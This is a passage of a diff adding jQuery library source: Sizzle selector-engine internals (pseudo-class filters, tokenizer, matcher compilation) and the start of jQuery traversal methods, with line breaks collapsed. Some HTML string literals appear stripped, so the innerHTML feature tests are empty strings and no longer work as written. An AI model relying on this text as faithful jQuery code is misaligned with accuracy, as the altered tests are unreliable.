uniqueCache[ type ] = [ dirruns, diff ]; + } + + if ( node === elem ) { + break; + } + } + } + } + } + + // Incorporate the offset, then check against cycle size + diff -= last; + return diff === first || ( diff % first === 0 && diff / first >= 0 ); + } + }; + }, + + "PSEUDO": function( pseudo, argument ) { + + // pseudo-class names are case-insensitive + // http://www.w3.org/TR/selectors/#pseudo-classes + // Prioritize by case sensitivity in case custom pseudos are added with uppercase letters + // Remember that setFilters inherits from pseudos + var args, + fn = Expr.pseudos[ pseudo ] || Expr.setFilters[ pseudo.toLowerCase() ] || + Sizzle.error( "unsupported pseudo: " + pseudo ); + + // The user may use createPseudo to indicate that + // arguments are needed to create the filter function + // just as Sizzle does + if ( fn[ expando ] ) { + return fn( argument ); + } + + // But maintain support for old signatures + if ( fn.length > 1 ) { + args = [ pseudo, pseudo, "", argument ]; + return Expr.setFilters.hasOwnProperty( pseudo.toLowerCase() ) ? + markFunction( function( seed, matches ) { + var idx, + matched = fn( seed, argument ), + i = matched.length; + while ( i-- ) { + idx = indexOf( seed, matched[ i ] ); + seed[ idx ] = !( matches[ idx ] = matched[ i ] ); + } + } ) : + function( elem ) { + return fn( elem, 0, args ); + }; + } + + return fn; + } + }, + + pseudos: { + + // Potentially complex pseudos + "not": markFunction( function( selector ) { + + // Trim the selector passed to compile + // to avoid treating leading and trailing + // spaces as combinators + var input = [], + results = [], + matcher = compile( selector.replace( rtrim, "$1" ) ); + + return matcher[ expando ] ? + markFunction( function( seed, matches, _context, xml ) { + var elem, + unmatched = matcher( seed, null, xml, [] ), + i = seed.length; + + // Match elements unmatched by `matcher` + while ( i-- ) { + if ( ( elem = unmatched[ i ] ) ) { + seed[ i ] = !( matches[ i ] = elem ); + } + } + } ) : + function( elem, _context, xml ) { + input[ 0 ] = elem; + matcher( input, null, xml, results ); + + // Don't keep the element (issue #299) + input[ 0 ] = null; + return !results.pop(); + }; + } ), + + "has": markFunction( function( selector ) { + return function( elem ) { + return Sizzle( selector, elem ).length > 0; + }; + } ), + + "contains": markFunction( function( text ) { + text = text.replace( runescape, funescape ); + return function( elem ) { + return ( elem.textContent || getText( elem ) ).indexOf( text ) > -1; + }; + } ), + + // "Whether an element is represented by a :lang() selector + // is based solely on the element's language value + // being equal to the identifier C, + // or beginning with the identifier C immediately followed by "-". + // The matching of C against the element's language value is performed case-insensitively. + // The identifier C does not have to be a valid language name." + // http://www.w3.org/TR/selectors/#lang-pseudo + "lang": markFunction( function( lang ) { + + // lang value must be a valid identifier + if ( !ridentifier.test( lang || "" ) ) { + Sizzle.error( "unsupported lang: " + lang ); + } + lang = lang.replace( runescape, funescape ).toLowerCase(); + return function( elem ) { + var elemLang; + do { + if ( ( elemLang = documentIsHTML ? + elem.lang : + elem.getAttribute( "xml:lang" ) || elem.getAttribute( "lang" ) ) ) { + + elemLang = elemLang.toLowerCase(); + return elemLang === lang || elemLang.indexOf( lang + "-" ) === 0; + } + } while ( ( elem = elem.parentNode ) && elem.nodeType === 1 ); + return false; + }; + } ), + + // Miscellaneous + "target": function( elem ) { + var hash = window.location && window.location.hash; + return hash && hash.slice( 1 ) === elem.id; + }, + + "root": function( elem ) { + return elem === docElem; + }, + + "focus": function( elem ) { + return elem === document.activeElement && + ( !document.hasFocus || document.hasFocus() ) && + !!( elem.type || elem.href || ~elem.tabIndex ); + }, + + // Boolean properties + "enabled": createDisabledPseudo( false ), + "disabled": createDisabledPseudo( true ), + + "checked": function( elem ) { + + // In CSS3, :checked should return both checked and selected elements + // http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked + var nodeName = elem.nodeName.toLowerCase(); + return ( nodeName === "input" && !!elem.checked ) || + ( nodeName === "option" && !!elem.selected ); + }, + + "selected": function( elem ) { + + // Accessing this property makes selected-by-default + // options in Safari work properly + if ( elem.parentNode ) { + // eslint-disable-next-line no-unused-expressions + elem.parentNode.selectedIndex; + } + + return elem.selected === true; + }, + + // Contents + "empty": function( elem ) { + + // http://www.w3.org/TR/selectors/#empty-pseudo + // :empty is negated by element (1) or content nodes (text: 3; cdata: 4; entity ref: 5), + // but not by others (comment: 8; processing instruction: 7; etc.) + // nodeType < 6 works because attributes (2) do not appear as children + for ( elem = elem.firstChild; elem; elem = elem.nextSibling ) { + if ( elem.nodeType < 6 ) { + return false; + } + } + return true; + }, + + "parent": function( elem ) { + return !Expr.pseudos[ "empty" ]( elem ); + }, + + // Element/input types + "header": function( elem ) { + return rheader.test( elem.nodeName ); + }, + + "input": function( elem ) { + return rinputs.test( elem.nodeName ); + }, + + "button": function( elem ) { + var name = elem.nodeName.toLowerCase(); + return name === "input" && elem.type === "button" || name === "button"; + }, + + "text": function( elem ) { + var attr; + return elem.nodeName.toLowerCase() === "input" && + elem.type === "text" && + + // Support: IE<8 + // New HTML5 attribute values (e.g., "search") appear with elem.type === "text" + ( ( attr = elem.getAttribute( "type" ) ) == null || + attr.toLowerCase() === "text" ); + }, + + // Position-in-collection + "first": createPositionalPseudo( function() { + return [ 0 ]; + } ), + + "last": createPositionalPseudo( function( _matchIndexes, length ) { + return [ length - 1 ]; + } ), + + "eq": createPositionalPseudo( function( _matchIndexes, length, argument ) { + return [ argument < 0 ? argument + length : argument ]; + } ), + + "even": createPositionalPseudo( function( matchIndexes, length ) { + var i = 0; + for ( ; i < length; i += 2 ) { + matchIndexes.push( i ); + } + return matchIndexes; + } ), + + "odd": createPositionalPseudo( function( matchIndexes, length ) { + var i = 1; + for ( ; i < length; i += 2 ) { + matchIndexes.push( i ); + } + return matchIndexes; + } ), + + "lt": createPositionalPseudo( function( matchIndexes, length, argument ) { + var i = argument < 0 ? + argument + length : + argument > length ? + length : + argument; + for ( ; --i >= 0; ) { + matchIndexes.push( i ); + } + return matchIndexes; + } ), + + "gt": createPositionalPseudo( function( matchIndexes, length, argument ) { + var i = argument < 0 ? argument + length : argument; + for ( ; ++i < length; ) { + matchIndexes.push( i ); + } + return matchIndexes; + } ) + } +}; + +Expr.pseudos[ "nth" ] = Expr.pseudos[ "eq" ]; + +// Add button/input type pseudos +for ( i in { radio: true, checkbox: true, file: true, password: true, image: true } ) { + Expr.pseudos[ i ] = createInputPseudo( i ); +} +for ( i in { submit: true, reset: true } ) { + Expr.pseudos[ i ] = createButtonPseudo( i ); +} + +// Easy API for creating new setFilters +function setFilters() {} +setFilters.prototype = Expr.filters = Expr.pseudos; +Expr.setFilters = new setFilters(); + +tokenize = Sizzle.tokenize = function( selector, parseOnly ) { + var matched, match, tokens, type, + soFar, groups, preFilters, + cached = tokenCache[ selector + " " ]; + + if ( cached ) { + return parseOnly ? 0 : cached.slice( 0 ); + } + + soFar = selector; + groups = []; + preFilters = Expr.preFilter; + + while ( soFar ) { + + // Comma and first run + if ( !matched || ( match = rcomma.exec( soFar ) ) ) { + if ( match ) { + + // Don't consume trailing commas as valid + soFar = soFar.slice( match[ 0 ].length ) || soFar; + } + groups.push( ( tokens = [] ) ); + } + + matched = false; + + // Combinators + if ( ( match = rcombinators.exec( soFar ) ) ) { + matched = match.shift(); + tokens.push( { + value: matched, + + // Cast descendant combinators to space + type: match[ 0 ].replace( rtrim, " " ) + } ); + soFar = soFar.slice( matched.length ); + } + + // Filters + for ( type in Expr.filter ) { + if ( ( match = matchExpr[ type ].exec( soFar ) ) && ( !preFilters[ type ] || + ( match = preFilters[ type ]( match ) ) ) ) { + matched = match.shift(); + tokens.push( { + value: matched, + type: type, + matches: match + } ); + soFar = soFar.slice( matched.length ); + } + } + + if ( !matched ) { + break; + } + } + + // Return the length of the invalid excess + // if we're just parsing + // Otherwise, throw an error or return tokens + return parseOnly ? + soFar.length : + soFar ? + Sizzle.error( selector ) : + + // Cache the tokens + tokenCache( selector, groups ).slice( 0 ); +}; + +function toSelector( tokens ) { + var i = 0, + len = tokens.length, + selector = ""; + for ( ; i < len; i++ ) { + selector += tokens[ i ].value; + } + return selector; +} + +function addCombinator( matcher, combinator, base ) { + var dir = combinator.dir, + skip = combinator.next, + key = skip || dir, + checkNonElements = base && key === "parentNode", + doneName = done++; + + return combinator.first ? + + // Check against closest ancestor/preceding element + function( elem, context, xml ) { + while ( ( elem = elem[ dir ] ) ) { + if ( elem.nodeType === 1 || checkNonElements ) { + return matcher( elem, context, xml ); + } + } + return false; + } : + + // Check against all ancestor/preceding elements + function( elem, context, xml ) { + var oldCache, uniqueCache, outerCache, + newCache = [ dirruns, doneName ]; + + // We can't set arbitrary data on XML nodes, so they don't benefit from combinator caching + if ( xml ) { + while ( ( elem = elem[ dir ] ) ) { + if ( elem.nodeType === 1 || checkNonElements ) { + if ( matcher( elem, context, xml ) ) { + return true; + } + } + } + } else { + while ( ( elem = elem[ dir ] ) ) { + if ( elem.nodeType === 1 || checkNonElements ) { + outerCache = elem[ expando ] || ( elem[ expando ] = {} ); + + // Support: IE <9 only + // Defend against cloned attroperties (jQuery gh-1709) + uniqueCache = outerCache[ elem.uniqueID ] || + ( outerCache[ elem.uniqueID ] = {} ); + + if ( skip && skip === elem.nodeName.toLowerCase() ) { + elem = elem[ dir ] || elem; + } else if ( ( oldCache = uniqueCache[ key ] ) && + oldCache[ 0 ] === dirruns && oldCache[ 1 ] === doneName ) { + + // Assign to newCache so results back-propagate to previous elements + return ( newCache[ 2 ] = oldCache[ 2 ] ); + } else { + + // Reuse newcache so results back-propagate to previous elements + uniqueCache[ key ] = newCache; + + // A match means we're done; a fail means we have to keep checking + if ( ( newCache[ 2 ] = matcher( elem, context, xml ) ) ) { + return true; + } + } + } + } + } + return false; + }; +} + +function elementMatcher( matchers ) { + return matchers.length > 1 ? + function( elem, context, xml ) { + var i = matchers.length; + while ( i-- ) { + if ( !matchers[ i ]( elem, context, xml ) ) { + return false; + } + } + return true; + } : + matchers[ 0 ]; +} + +function multipleContexts( selector, contexts, results ) { + var i = 0, + len = contexts.length; + for ( ; i < len; i++ ) { + Sizzle( selector, contexts[ i ], results ); + } + return results; +} + +function condense( unmatched, map, filter, context, xml ) { + var elem, + newUnmatched = [], + i = 0, + len = unmatched.length, + mapped = map != null; + + for ( ; i < len; i++ ) { + if ( ( elem = unmatched[ i ] ) ) { + if ( !filter || filter( elem, context, xml ) ) { + newUnmatched.push( elem ); + if ( mapped ) { + map.push( i ); + } + } + } + } + + return newUnmatched; +} + +function setMatcher( preFilter, selector, matcher, postFilter, postFinder, postSelector ) { + if ( postFilter && !postFilter[ expando ] ) { + postFilter = setMatcher( postFilter ); + } + if ( postFinder && !postFinder[ expando ] ) { + postFinder = setMatcher( postFinder, postSelector ); + } + return markFunction( function( seed, results, context, xml ) { + var temp, i, elem, + preMap = [], + postMap = [], + preexisting = results.length, + + // Get initial elements from seed or context + elems = seed || multipleContexts( + selector || "*", + context.nodeType ? [ context ] : context, + [] + ), + + // Prefilter to get matcher input, preserving a map for seed-results synchronization + matcherIn = preFilter && ( seed || !selector ) ? + condense( elems, preMap, preFilter, context, xml ) : + elems, + + matcherOut = matcher ? + + // If we have a postFinder, or filtered seed, or non-seed postFilter or preexisting results, + postFinder || ( seed ? preFilter : preexisting || postFilter ) ? + + // ...intermediate processing is necessary + [] : + + // ...otherwise use results directly + results : + matcherIn; + + // Find primary matches + if ( matcher ) { + matcher( matcherIn, matcherOut, context, xml ); + } + + // Apply postFilter + if ( postFilter ) { + temp = condense( matcherOut, postMap ); + postFilter( temp, [], context, xml ); + + // Un-match failing elements by moving them back to matcherIn + i = temp.length; + while ( i-- ) { + if ( ( elem = temp[ i ] ) ) { + matcherOut[ postMap[ i ] ] = !( matcherIn[ postMap[ i ] ] = elem ); + } + } + } + + if ( seed ) { + if ( postFinder || preFilter ) { + if ( postFinder ) { + + // Get the final matcherOut by condensing this intermediate into postFinder contexts + temp = []; + i = matcherOut.length; + while ( i-- ) { + if ( ( elem = matcherOut[ i ] ) ) { + + // Restore matcherIn since elem is not yet a final match + temp.push( ( matcherIn[ i ] = elem ) ); + } + } + postFinder( null, ( matcherOut = [] ), temp, xml ); + } + + // Move matched elements from seed to results to keep them synchronized + i = matcherOut.length; + while ( i-- ) { + if ( ( elem = matcherOut[ i ] ) && + ( temp = postFinder ? indexOf( seed, elem ) : preMap[ i ] ) > -1 ) { + + seed[ temp ] = !( results[ temp ] = elem ); + } + } + } + + // Add elements to results, through postFinder if defined + } else { + matcherOut = condense( + matcherOut === results ? + matcherOut.splice( preexisting, matcherOut.length ) : + matcherOut + ); + if ( postFinder ) { + postFinder( null, results, matcherOut, xml ); + } else { + push.apply( results, matcherOut ); + } + } + } ); +} + +function matcherFromTokens( tokens ) { + var checkContext, matcher, j, + len = tokens.length, + leadingRelative = Expr.relative[ tokens[ 0 ].type ], + implicitRelative = leadingRelative || Expr.relative[ " " ], + i = leadingRelative ? 1 : 0, + + // The foundational matcher ensures that elements are reachable from top-level context(s) + matchContext = addCombinator( function( elem ) { + return elem === checkContext; + }, implicitRelative, true ), + matchAnyContext = addCombinator( function( elem ) { + return indexOf( checkContext, elem ) > -1; + }, implicitRelative, true ), + matchers = [ function( elem, context, xml ) { + var ret = ( !leadingRelative && ( xml || context !== outermostContext ) ) || ( + ( checkContext = context ).nodeType ? + matchContext( elem, context, xml ) : + matchAnyContext( elem, context, xml ) ); + + // Avoid hanging onto element (issue #299) + checkContext = null; + return ret; + } ]; + + for ( ; i < len; i++ ) { + if ( ( matcher = Expr.relative[ tokens[ i ].type ] ) ) { + matchers = [ addCombinator( elementMatcher( matchers ), matcher ) ]; + } else { + matcher = Expr.filter[ tokens[ i ].type ].apply( null, tokens[ i ].matches ); + + // Return special upon seeing a positional matcher + if ( matcher[ expando ] ) { + + // Find the next relative operator (if any) for proper handling + j = ++i; + for ( ; j < len; j++ ) { + if ( Expr.relative[ tokens[ j ].type ] ) { + break; + } + } + return setMatcher( + i > 1 && elementMatcher( matchers ), + i > 1 && toSelector( + + // If the preceding token was a descendant combinator, insert an implicit any-element `*` + tokens + .slice( 0, i - 1 ) + .concat( { value: tokens[ i - 2 ].type === " " ? "*" : "" } ) + ).replace( rtrim, "$1" ), + matcher, + i < j && matcherFromTokens( tokens.slice( i, j ) ), + j < len && matcherFromTokens( ( tokens = tokens.slice( j ) ) ), + j < len && toSelector( tokens ) + ); + } + matchers.push( matcher ); + } + } + + return elementMatcher( matchers ); +} + +function matcherFromGroupMatchers( elementMatchers, setMatchers ) { + var bySet = setMatchers.length > 0, + byElement = elementMatchers.length > 0, + superMatcher = function( seed, context, xml, results, outermost ) { + var elem, j, matcher, + matchedCount = 0, + i = "0", + unmatched = seed && [], + setMatched = [], + contextBackup = outermostContext, + + // We must always have either seed elements or outermost context + elems = seed || byElement && Expr.find[ "TAG" ]( "*", outermost ), + + // Use integer dirruns iff this is the outermost matcher + dirrunsUnique = ( dirruns += contextBackup == null ? 1 : Math.random() || 0.1 ), + len = elems.length; + + if ( outermost ) { + + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + // eslint-disable-next-line eqeqeq + outermostContext = context == document || context || outermost; + } + + // Add elements passing elementMatchers directly to results + // Support: IE<9, Safari + // Tolerate NodeList properties (IE: "length"; Safari: ) matching elements by id + for ( ; i !== len && ( elem = elems[ i ] ) != null; i++ ) { + if ( byElement && elem ) { + j = 0; + + // Support: IE 11+, Edge 17 - 18+ + // IE/Edge sometimes throw a "Permission denied" error when strict-comparing + // two documents; shallow comparisons work. + // eslint-disable-next-line eqeqeq + if ( !context && elem.ownerDocument != document ) { + setDocument( elem ); + xml = !documentIsHTML; + } + while ( ( matcher = elementMatchers[ j++ ] ) ) { + if ( matcher( elem, context || document, xml ) ) { + results.push( elem ); + break; + } + } + if ( outermost ) { + dirruns = dirrunsUnique; + } + } + + // Track unmatched elements for set filters + if ( bySet ) { + + // They will have gone through all possible matchers + if ( ( elem = !matcher && elem ) ) { + matchedCount--; + } + + // Lengthen the array for every element, matched or not + if ( seed ) { + unmatched.push( elem ); + } + } + } + + // `i` is now the count of elements visited above, and adding it to `matchedCount` + // makes the latter nonnegative. + matchedCount += i; + + // Apply set filters to unmatched elements + // NOTE: This can be skipped if there are no unmatched elements (i.e., `matchedCount` + // equals `i`), unless we didn't visit _any_ elements in the above loop because we have + // no element matchers and no seed. + // Incrementing an initially-string "0" `i` allows `i` to remain a string only in that + // case, which will result in a "00" `matchedCount` that differs from `i` but is also + // numerically zero. + if ( bySet && i !== matchedCount ) { + j = 0; + while ( ( matcher = setMatchers[ j++ ] ) ) { + matcher( unmatched, setMatched, context, xml ); + } + + if ( seed ) { + + // Reintegrate element matches to eliminate the need for sorting + if ( matchedCount > 0 ) { + while ( i-- ) { + if ( !( unmatched[ i ] || setMatched[ i ] ) ) { + setMatched[ i ] = pop.call( results ); + } + } + } + + // Discard index placeholder values to get only actual matches + setMatched = condense( setMatched ); + } + + // Add matches to results + push.apply( results, setMatched ); + + // Seedless set matches succeeding multiple successful matchers stipulate sorting + if ( outermost && !seed && setMatched.length > 0 && + ( matchedCount + setMatchers.length ) > 1 ) { + + Sizzle.uniqueSort( results ); + } + } + + // Override manipulation of globals by nested matchers + if ( outermost ) { + dirruns = dirrunsUnique; + outermostContext = contextBackup; + } + + return unmatched; + }; + + return bySet ? + markFunction( superMatcher ) : + superMatcher; +} + +compile = Sizzle.compile = function( selector, match /* Internal Use Only */ ) { + var i, + setMatchers = [], + elementMatchers = [], + cached = compilerCache[ selector + " " ]; + + if ( !cached ) { + + // Generate a function of recursive functions that can be used to check each element + if ( !match ) { + match = tokenize( selector ); + } + i = match.length; + while ( i-- ) { + cached = matcherFromTokens( match[ i ] ); + if ( cached[ expando ] ) { + setMatchers.push( cached ); + } else { + elementMatchers.push( cached ); + } + } + + // Cache the compiled function + cached = compilerCache( + selector, + matcherFromGroupMatchers( elementMatchers, setMatchers ) + ); + + // Save selector and tokenization + cached.selector = selector; + } + return cached; +}; + +/** + * A low-level selection function that works with Sizzle's compiled + * selector functions + * @param {String|Function} selector A selector or a pre-compiled + * selector function built with Sizzle.compile + * @param {Element} context + * @param {Array} [results] + * @param {Array} [seed] A set of elements to match against + */ +select = Sizzle.select = function( selector, context, results, seed ) { + var i, tokens, token, type, find, + compiled = typeof selector === "function" && selector, + match = !seed && tokenize( ( selector = compiled.selector || selector ) ); + + results = results || []; + + // Try to minimize operations if there is only one selector in the list and no seed + // (the latter of which guarantees us context) + if ( match.length === 1 ) { + + // Reduce context if the leading compound selector is an ID + tokens = match[ 0 ] = match[ 0 ].slice( 0 ); + if ( tokens.length > 2 && ( token = tokens[ 0 ] ).type === "ID" && + context.nodeType === 9 && documentIsHTML && Expr.relative[ tokens[ 1 ].type ] ) { + + context = ( Expr.find[ "ID" ]( token.matches[ 0 ] + .replace( runescape, funescape ), context ) || [] )[ 0 ]; + if ( !context ) { + return results; + + // Precompiled matchers will still verify ancestry, so step up a level + } else if ( compiled ) { + context = context.parentNode; + } + + selector = selector.slice( tokens.shift().value.length ); + } + + // Fetch a seed set for right-to-left matching + i = matchExpr[ "needsContext" ].test( selector ) ? 0 : tokens.length; + while ( i-- ) { + token = tokens[ i ]; + + // Abort if we hit a combinator + if ( Expr.relative[ ( type = token.type ) ] ) { + break; + } + if ( ( find = Expr.find[ type ] ) ) { + + // Search, expanding context for leading sibling combinators + if ( ( seed = find( + token.matches[ 0 ].replace( runescape, funescape ), + rsibling.test( tokens[ 0 ].type ) && testContext( context.parentNode ) || + context + ) ) ) { + + // If seed is empty or no tokens remain, we can return early + tokens.splice( i, 1 ); + selector = seed.length && toSelector( tokens ); + if ( !selector ) { + push.apply( results, seed ); + return results; + } + + break; + } + } + } + } + + // Compile and execute a filtering function if one is not provided + // Provide `match` to avoid retokenization if we modified the selector above + ( compiled || compile( selector, match ) )( + seed, + context, + !documentIsHTML, + results, + !context || rsibling.test( selector ) && testContext( context.parentNode ) || context + ); + return results; +}; + +// One-time assignments + +// Sort stability +support.sortStable = expando.split( "" ).sort( sortOrder ).join( "" ) === expando; + +// Support: Chrome 14-35+ +// Always assume duplicates if they aren't passed to the comparison function +support.detectDuplicates = !!hasDuplicate; + +// Initialize against the default document +setDocument(); + +// Support: Webkit<537.32 - Safari 6.0.3/Chrome 25 (fixed in Chrome 27) +// Detached nodes confoundingly follow *each other* +support.sortDetached = assert( function( el ) { + + // Should return 1, but returns 4 (following) + return el.compareDocumentPosition( document.createElement( "fieldset" ) ) & 1; +} ); + +// Support: IE<8 +// Prevent attribute/property "interpolation" +// https://msdn.microsoft.com/en-us/library/ms536429%28VS.85%29.aspx +if ( !assert( function( el ) { + el.innerHTML = ""; + return el.firstChild.getAttribute( "href" ) === "#"; +} ) ) { + addHandle( "type|href|height|width", function( elem, name, isXML ) { + if ( !isXML ) { + return elem.getAttribute( name, name.toLowerCase() === "type" ? 1 : 2 ); + } + } ); +} + +// Support: IE<9 +// Use defaultValue in place of getAttribute("value") +if ( !support.attributes || !assert( function( el ) { + el.innerHTML = ""; + el.firstChild.setAttribute( "value", "" ); + return el.firstChild.getAttribute( "value" ) === ""; +} ) ) { + addHandle( "value", function( elem, _name, isXML ) { + if ( !isXML && elem.nodeName.toLowerCase() === "input" ) { + return elem.defaultValue; + } + } ); +} + +// Support: IE<9 +// Use getAttributeNode to fetch booleans when getAttribute lies +if ( !assert( function( el ) { + return el.getAttribute( "disabled" ) == null; +} ) ) { + addHandle( booleans, function( elem, name, isXML ) { + var val; + if ( !isXML ) { + return elem[ name ] === true ? name.toLowerCase() : + ( val = elem.getAttributeNode( name ) ) && val.specified ? + val.value : + null; + } + } ); +} + +return Sizzle; + +} )( window ); + + + +jQuery.find = Sizzle; +jQuery.expr = Sizzle.selectors; + +// Deprecated +jQuery.expr[ ":" ] = jQuery.expr.pseudos; +jQuery.uniqueSort = jQuery.unique = Sizzle.uniqueSort; +jQuery.text = Sizzle.getText; +jQuery.isXMLDoc = Sizzle.isXML; +jQuery.contains = Sizzle.contains; +jQuery.escapeSelector = Sizzle.escape; + + + + +var dir = function( elem, dir, until ) { + var matched = [], + truncate = until !== undefined; + + while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { + if ( elem.nodeType === 1 ) { + if ( truncate && jQuery( elem ).is( until ) ) { + break; + } + matched.push( elem ); + } + } + return matched; +}; + + +var siblings = function( n, elem ) { + var matched = []; + + for ( ; n; n = n.nextSibling ) { + if ( n.nodeType === 1 && n !== elem ) { + matched.push( n ); + } + } + + return matched; +}; + + +var rneedsContext = jQuery.expr.match.needsContext; + + + +function nodeName( elem, name ) { + + return elem.nodeName && elem.nodeName.toLowerCase() === name.toLowerCase(); + +}; +var rsingleTag = ( /^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i ); + + + +// Implement the identical functionality for filter and not +function winnow( elements, qualifier, not ) { + if ( isFunction( qualifier ) ) { + return jQuery.grep( elements, function( elem, i ) { + return !!qualifier.call( elem, i, elem ) !== not; + } ); + } + + // Single element + if ( qualifier.nodeType ) { + return jQuery.grep( elements, function( elem ) { + return ( elem === qualifier ) !== not; + } ); + } + + // Arraylike of elements (jQuery, arguments, Array) + if ( typeof qualifier !== "string" ) { + return jQuery.grep( elements, function( elem ) { + return ( indexOf.call( qualifier, elem ) > -1 ) !== not; + } ); + } + + // Filtered directly for both simple and complex selectors + return jQuery.filter( qualifier, elements, not ); +} + +jQuery.filter = function( expr, elems, not ) { + var elem = elems[ 0 ]; + + if ( not ) { + expr = ":not(" + expr + ")"; + } + + if ( elems.length === 1 && elem.nodeType === 1 ) { + return jQuery.find.matchesSelector( elem, expr ) ? [ elem ] : []; + } + + return jQuery.find.matches( expr, jQuery.grep( elems, function( elem ) { + return elem.nodeType === 1; + } ) ); +}; + +jQuery.fn.extend( { + find: function( selector ) { + var i, ret, + len = this.length, + self = this; + + if ( typeof selector !== "string" ) { + return this.pushStack( jQuery( selector ).filter( function() { + for ( i = 0; i < len; i++ ) { + if ( jQuery.contains( self[ i ], this ) ) { + return true; + } + } + } ) ); + } + + ret = this.pushStack( [] ); + + for ( i = 0; i < len; i++ ) { + jQuery.find( selector, self[ i ], ret ); + } + + return len > 1 ? jQuery.uniqueSort( ret ) : ret; + }, + filter: function( selector ) { + return this.pushStack( winnow( this, selector || [], false ) ); + }, + not: function( selector ) { + return this.pushStack( winnow( this, selector || [], true ) ); + }, + is: function( selector ) { + return !!winnow( + this, + + // If this is a positional/relative selector, check membership in the returned set + // so $("p:first").is("p:last") won't return true for a doc with two "p". + typeof selector === "string" && rneedsContext.test( selector ) ? + jQuery( selector ) : + selector || [], + false + ).length; + } +} ); + + +// Initialize a jQuery object + + +// A central reference to the root jQuery(document) +var rootjQuery, + + // A simple way to check for HTML strings + // Prioritize #id over to avoid XSS via location.hash (#9521) + // Strict HTML recognition (#11290: must start with <) + // Shortcut simple #id case for speed + rquickExpr = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/, + + init = jQuery.fn.init = function( selector, context, root ) { + var match, elem; + + // HANDLE: $(""), $(null), $(undefined), $(false) + if ( !selector ) { + return this; + } + + // Method init() accepts an alternate rootjQuery + // so migrate can support jQuery.sub (gh-2101) + root = root || rootjQuery; + + // Handle HTML strings + if ( typeof selector === "string" ) { + if ( selector[ 0 ] === "<" && + selector[ selector.length - 1 ] === ">" && + selector.length >= 3 ) { + + // Assume that strings that start and end with <> are HTML and skip the regex check + match = [ null, selector, null ]; + + } else { + match = rquickExpr.exec( selector ); + } + + // Match html or make sure no context is specified for #id + if ( match && ( match[ 1 ] || !context ) ) { + + // HANDLE: $(html) -> $(array) + if ( match[ 1 ] ) { + context = context instanceof jQuery ? context[ 0 ] : context; + + // Option to run scripts is true for back-compat + // Intentionally let the error be thrown if parseHTML is not present + jQuery.merge( this, jQuery.parseHTML( + match[ 1 ], + context && context.nodeType ? context.ownerDocument || context : document, + true + ) ); + + // HANDLE: $(html, props) + if ( rsingleTag.test( match[ 1 ] ) && jQuery.isPlainObject( context ) ) { + for ( match in context ) { + + // Properties of context are called as methods if possible + if ( isFunction( this[ match ] ) ) { + this[ match ]( context[ match ] ); + + // ...and otherwise set as attributes + } else { + this.attr( match, context[ match ] ); + } + } + } + + return this; + + // HANDLE: $(#id) + } else { + elem = document.getElementById( match[ 2 ] ); + + if ( elem ) { + + // Inject the element directly into the jQuery object + this[ 0 ] = elem; + this.length = 1; + } + return this; + } + + // HANDLE: $(expr, $(...)) + } else if ( !context || context.jquery ) { + return ( context || root ).find( selector ); + + // HANDLE: $(expr, context) + // (which is just equivalent to: $(context).find(expr) + } else { + return this.constructor( context ).find( selector ); + } + + // HANDLE: $(DOMElement) + } else if ( selector.nodeType ) { + this[ 0 ] = selector; + this.length = 1; + return this; + + // HANDLE: $(function) + // Shortcut for document ready + } else if ( isFunction( selector ) ) { + return root.ready !== undefined ? + root.ready( selector ) : + + // Execute immediately if ready is not present + selector( jQuery ); + } + + return jQuery.makeArray( selector, this ); + }; + +// Give the init function the jQuery prototype for later instantiation +init.prototype = jQuery.fn; + +// Initialize central reference +rootjQuery = jQuery( document ); + + +var rparentsprev = /^(?:parents|prev(?:Until|All))/, + + // Methods guaranteed to produce a unique set when starting from a unique set + guaranteedUnique = { + children: true, + contents: true, + next: true, + prev: true + }; + +jQuery.fn.extend( { + has: function( target ) { + var targets = jQuery( target, this ), + l = targets.length; + + return this.filter( function() { + var i = 0; + for ( ; i < l; i++ ) { + if ( jQuery.contains( this, targets[ i ] ) ) { + return true; + } + } + } ); + }, + + closest: function( selectors, context ) { + var cur, + i = 0, + l = this.length, + matched = [], + targets = typeof selectors !== "string" && jQuery( selectors ); + + // Positional selectors never match, since there's no _selection_ context + if ( !rneedsContext.test( selectors ) ) { + for ( ; i < l; i++ ) { + for ( cur = this[ i ]; cur && cur !== context; cur = cur.parentNode ) { + + // Always skip document fragments + if ( cur.nodeType < 11 && ( targets ? + targets.index( cur ) > -1 : + + // Don't pass non-elements to Sizzle + cur.nodeType === 1 && + jQuery.find.matchesSelector( cur, selectors ) ) ) { + + matched.push( cur ); + break; + } + } + } + } + + return this.pushStack( matched.length > 1 ? jQuery.uniqueSort( matched ) : matched ); + }, + + // Determine the position of an element within the set + index: function( elem ) { + + // No argument, return index in parent + if ( !elem ) { + return ( this[ 0 ] && this[ 0 ].parentNode ) ? this.first().prevAll().length : -1; + } + + // Index in selector + if ( typeof elem === "string" ) { + return indexOf.call( jQuery( elem ), this[ 0 ] ); + } + + // Locate the position of the desired element + return indexOf.call( this, + + // If it receives a jQuery object, the first element is used + elem.jquery ? elem[ 0 ] : elem + ); + }, + + add: function( selector, context ) { + return this.pushStack( + jQuery.uniqueSort( + jQuery.merge( this.get(), jQuery( selector, context ) ) + ) + ); + }, + + addBack: function( selector ) { + return this.add( selector == null ? + this.prevObject : this.prevObject.filter( selector ) + ); + } +} ); + +function sibling( cur, dir ) { + while ( ( cur = cur[ dir ] ) && cur.nodeType !== 1 ) {} + return cur; +} + +jQuery.each( { + parent: function( elem ) { + var parent = elem.parentNode; + return parent && parent.nodeType !== 11 ? parent : null; + }, + parents: function( elem ) { + return dir( elem, "parentNode" ); + }, + parentsUntil: function( elem, _i, until ) { + return dir( elem, "parentNode", until ); + }, + next: function( elem ) { + return sibling( elem, "nextSibling" ); + }, + prev: function( elem ) { + return sibling( elem, "previousSibling" ); + }, + nextAll: function( elem ) { + return dir( elem, "nextSibling" ); + }, + prevAll: function( elem ) { + return dir( elem, "previousSibling" ); + }, + nextUntil: function( elem, _i, until ) { + return dir( elem, "nextSibling", until ); + }, + prevUntil: function( elem, _i, until ) { + return dir( elem, "previousSibling", until ); + }, + siblings: function( elem ) { + return siblings( ( elem.parentNode || {} ).firstChild, elem ); + }, + children: function( elem ) { + return siblings( elem.firstChild ); + }, + contents: function( elem ) { + if ( 